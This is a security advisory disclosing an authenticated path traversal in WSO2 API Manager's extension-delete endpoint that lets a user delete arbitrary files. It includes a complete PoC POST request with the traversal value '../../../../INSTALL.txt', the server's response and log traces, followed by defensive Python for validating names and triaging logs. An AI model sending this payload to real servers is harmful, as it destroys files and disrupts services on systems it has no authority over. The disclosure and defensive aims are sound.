# Title: WSO2 3.1.0 - Arbitrary File Delete
# Date: 2020-04-12
# Author: raki ben hamouda
# Vendor: https://apim.docs.wso2.com
# Software link: https://apim.docs.wso2.com/en/latest/
# CVE: N/A

Document Title:
===============
WSO2 API Manager (Delete Extension) Arbitrary File Delete (Path Traversal)

## CVE not assigned yet
## Security Update: https://apim.docs.wso2.com/en/latest/

Common Vulnerability Scoring System:
====================================
8.5

Affected Product(s):
====================
WSO2 API Manager Carbon Interface

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
A remote arbitrary file delete vulnerability has been discovered in the official WSO2 API Manager Carbon UI product.
The security vulnerability allows a remote attacker with low privileges to perform authenticated application requests
and to delete arbitrary system files.
The vulnerability is located in the `/carbon/extensions/deleteExtension-ajaxprocessor.jsp` module, in the `extensionName` parameter
that names the extension to delete. Remote attackers are able to delete arbitrary files, such as configuration files and database (.db) files,
via authenticated POST requests carrying a crafted path traversal string in `extensionName`. The security risk of the arbitrary delete vulnerability is estimated as high, with a CVSS (Common Vulnerability Scoring System) count of 8.5. Exploitation of the path traversal vulnerability requires a low-privilege web-application user account and no user interaction.
Successful exploitation of the vulnerability results in loss of availability, integrity and confidentiality.

===============================
Error generated by the server when the file is not found, taken from the log file (this is what brought my attention to it):

[2020-01-04 01:40:43,318] ERROR - ResourceServiceClient Failed to remove extension.
org.apache.axis2.AxisFault: File does not exist: E:\api-wso2\bin\..\repository\deployment\server\registryextensions\commons-dir
    at org.apache.axis2.util.Utils.getInboundFaultFromMessageContext(Utils.java:531) ~[axis2_1.6.1.wso2v38.jar:?]
    at org.apache.axis2.description.OutInAxisOperationClient.handleResponse(OutInAxisOperation.java:382) ~[axis2_1.6.1.wso2v38.jar:?]
    at org.apache.axis2.description.OutInAxisOperationClient.send(OutInAxisOperation.java:457) ~[axis2_1.6.1.wso2v38.jar:?]
    at org.apache.axis2.description.OutInAxisOperationClient.executeImpl(OutInAxisOperation.java:228) ~[axis2_1.6.1.wso2v38.jar:?]
    at org.apache.axis2.client.OperationClient.execute(OperationClient.java:149) ~[axis2_1.6.1.wso2v38.jar:?]
    at org.wso2.carbon.registry.extensions.stub.ResourceAdminServiceStub.removeExtension(ResourceAdminServiceStub.java:5954) ~[org.wso2.carbon.registry.extensions.stub_4.7.13.jar:?]
    at org.wso2.carbon.registry.extensions.ui.clients.ResourceServiceClient.deleteExtension(ResourceServiceClient.java:137) [org.wso2.carbon.registry.extensions.ui_4.7.13.jar:?]
    at org.apache.jsp.extensions.deleteExtension_002dajaxprocessor_jsp._jspService(deleteExtension_002dajaxprocessor_jsp.java:139) [hc_795974301/:?]
    at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70) [tomcat_9.0.22.wso2v1.jar:?]

* Error displayed in web browser with body request:
<script type="text/javascript">CARBON.showErrorDialog("File does not exist: E:\api-wso2\bin\..\repository\deployment\server\registryextensions\nofile.jar");</script>

=============================
Request Method(s):
[+] POST

Vulnerable Module(s):
[+] /carbon/extensions/deleteExtension-ajaxprocessor.jsp

Vulnerable Parameter(s):
[+] extensionName

Server version:
3.0.0

Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers with a low-privileged web-application user account and with no user interaction.
For a security demonstration or to reproduce the vulnerability, follow the provided information and steps below.

1- The attacker must have access to the Extension component (List, Add, Delete extensions).
2- The attacker uploads any file with a .jar extension.
3- The attacker intercepts the request that follows and modifies the parameter with a traversal string:

--- PoC Session Logs [POST] ---
POST /carbon/extensions/deleteExtension-ajaxprocessor.jsp HTTP/1.1
Host: localhost:9443
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest, XMLHttpRequest
X-Prototype-Version: 1.5.0
Content-type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-Token: 0OQG-MM0W-1CY9-K503-1X3I-J4M1-YF2Z-J4NS
Content-Length: 22
Origin: https://localhost:9443
Connection: close
Referer: https://localhost:9443/carbon/extensions/list_extensions.jsp?region=region3&item=list_extensions_menu
Cookie: JSESSIONID=BD1005351C7DC1E70CA763D5EBD5390B; requestedURI=../../carbon/functions-library-mgt/functions-library-mgt-add.jsp?region=region1&item=function_libraries_add; region1_configure_menu=none; region3_registry_menu=visible; region4_monitor_menu=none; region5_tools_menu=none; current-breadcrumb=extensions_menu%252Clist_extensions_menu%2523; MSG15780931689110.08734318816834985=true; MSG15780932448520.1389658752202746=true; MSG15780934638710.11615678726759582=true; MSG15780941514590.39351165459685944=true; MSG15780941548760.1587776077002745=true; MSG15780944563770.9802725740232142=true; MSG15780944882480.28388839177015013=true; MSG15780945113520.5908842754830942=true; menuPanel=visible; menuPanelType=extensions
Pragma: no-cache
Cache-Control: no-cache

extensionName=../../../../INSTALL.txt
---------------Returned Headers in Response------------------
HTTP/1.1 200
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Content-Type: text/html;charset=UTF-8
Content-Length: 10
Date: Sat, 04 Jan 2020 00:55:38 GMT
Connection: close
Server: WSO2 Carbon Server
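As an added defender-side example (not part of the original advisory and not WSO2's code), the following Python shows the two checks this bug calls for: a containment check on `extensionName` that refuses the traversal value used in the PoC, and a log triage function for the `Failed to remove extension` fault quoted above, which normalises the reported Windows path before deciding whether it escaped registryextensions, because the server's own `bin\..\repository` prefix would otherwise trip a naive `..` match. The base directory and the sample log lines are constructed placeholders.

```python
import ntpath
import re
from pathlib import Path

# Constructed placeholder for <CARBON_HOME>; the advisory's stack trace shows
# extensions under repository/deployment/server/registryextensions.
EXTENSIONS_DIR = Path("/opt/wso2am/repository/deployment/server/registryextensions")
# Allow-list for a bare extension file name: no '/', '\', NUL or leading '.',
# and it must end in .jar (the PoC uploads extensions as .jar files).
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,200}\.jar")
FAULT_PREFIX = "File does not exist: "


def is_safe_extension_name(name: str, base_dir: Path = EXTENSIONS_DIR) -> bool:
    """Hypothetical hardening for the deleteExtension handler (not WSO2's code).

    True only if `name` is a plain .jar file name that resolves to a direct
    child of base_dir, so the PoC value '../../../../INSTALL.txt' is refused.
    """
    if not SAFE_NAME.fullmatch(name):
        return False
    # Defence in depth: even if the allow-list is loosened later, the resolved
    # target must still be a direct child of the extensions directory.
    base = base_dir.resolve()
    candidate = (base / name).resolve()
    return candidate.parent == base and candidate.name == name


def delete_escaped_extensions_dir(log_line: str) -> bool:
    """Triage the 'Failed to remove extension' AxisFault quoted in the advisory.

    True when the path the server failed to delete lies outside
    registryextensions once '..' segments are collapsed. Matching on '..'
    alone is not enough: the server's own 'bin\\..\\repository' prefix
    contains one on every request. ntpath handles the advisory's Windows
    paths on any host and also folds '/' to '\\'.
    """
    idx = log_line.find(FAULT_PREFIX)
    if idx < 0:
        return False
    target = ntpath.normpath(log_line[idx + len(FAULT_PREFIX):].strip())
    return ntpath.basename(ntpath.dirname(target)).lower() != "registryextensions"


# Constructed log lines modelled on the advisory's error (not real server output).
LOG_BENIGN = ("org.apache.axis2.AxisFault: File does not exist: "
              r"E:\api-wso2\bin\..\repository\deployment\server\registryextensions\nofile.jar")
LOG_TRAVERSAL = ("org.apache.axis2.AxisFault: File does not exist: "
                 r"E:\api-wso2\bin\..\repository\deployment\server\registryextensions\../../../../INSTALL.txt")
```

The log check only sees deletions that failed; the PoC request above came back as a plain HTTP 200, so the name validator is the actual fix and the log triage is a retrospective signal.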